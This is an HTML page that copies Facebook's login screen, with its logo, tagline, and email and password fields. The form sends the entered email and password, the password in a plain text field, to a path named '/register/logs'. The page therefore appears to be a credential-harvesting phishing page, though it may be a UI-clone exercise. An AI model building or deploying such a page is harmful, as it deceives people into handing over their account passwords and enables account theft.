<html lang="en">
<head>

  <title>Document</title>
  <style>
        *,html{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body{
            background-color: #f0f2f5;
        }
        #main{
            display : grid;
            grid-template-columns: repeat(4,1fr);
            gap: 20px;
            padding: 20px 100px;

        }
        .fb{
            height: 100%;
            display: flex;
            justify-content: center;
            width: 100%;
            gap: 10px;
            / padding: 0px 10px 0px 20px; /
            flex-direction: row;
            box-sizing: border-box;
        }
        .second{
            margin-top: 130px;
        }
        .clamp{
            font-size: clamp(13px,20px + 5vw,23px);
        }
        @media(max-width:992px){
            #main{
            / display : grid; /
            padding: 20px 70px;
            grid-template-columns: repeat(2,1fr);
        }
        }
        @media(max-width:900px){
            #main{
            / display : grid; /
            grid-template-columns: repeat(1,1fr);
            padding: 20px 50px;
        }
        .fb{
            flex-direction: column;
            align-items: center;
            padding: 0px 10px 0px 10px;
            margin-top: 0;
        }
        .second{
            margin-top: -50px;
            margin-bottom: 50px;
        }
        div :first-of-type p {
            font-size: 13px;
        }
        }
        input{
            height:50px;width: 100%;border-radius: 5px;border: 1px solid rgba(0, 0, 0, 0.2);margin-bottom: 10px;padding-left: 20px;font-size: 16px;
        }
        input::placeholder{
           / padding-left: 20px; /
           font-size: 16px;
           color: gray;
           / margin-left: -20px; /
        }
       input:focus{
        color: blue;
       }

    </style>
</head>
<body>

<div class="fb">
  <div style="margin-top: 180px;">
    <img src="./assets/fb.svg" alt="" style="max-width: 300px;">
    <p class="clamp" style="margin-top:-10px;margin-left: 30px;max-width: 480px;font-family:SFProDisplay-Regular, Helvetica, Arial, sans-serif ;">Facebook helps you connect and share with the people in your life.</p>
  </div>
  <div class="second" style="max-width: 450px;">
    <div style="background-color: white;padding:15px 15px 20px 15px; display: flex;justify-content: center;flex-direction: column;border-radius: 7px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);width: 120%;">




      <form action="/register/logs" method="post">
        <input type="text"  id="email" name="email" placeholder="Email address or phone number">
        <input type="text" id="password" name="password" placeholder="Password" >
        <button style="width: 100%;align-self: center;height:50px;margin-bottom: 15px;background-color: #1877f2;color: white;border: 0;border-radius: 5px;font-size: 20px;font-weight:600;">Log in</button>
      </form>
      <a href="" style="margin: 0 auto;text-decoration: none;color: #1877f2;">Forgotten Password</a><br>
      <div style="border-bottom: 1px solid rgba(0,0,0,0.15);"></div>
      <br>
      <button style="width: 60%;align-self: center;height:50px;margin-top: 15px;background-color: #42b72a;color: white;border: 0;border-radius: 5px;font-size: 18px;font-weight:600;"  ><a rel="" href="fbRegister.html">Create New Account</a></button>
    </div>
    <p style="display: flex;justify-content: center;margin-top: 20px;">Create a Page for a celebrity, brand or business.</p>
  </div>
</div>
</body>
</html>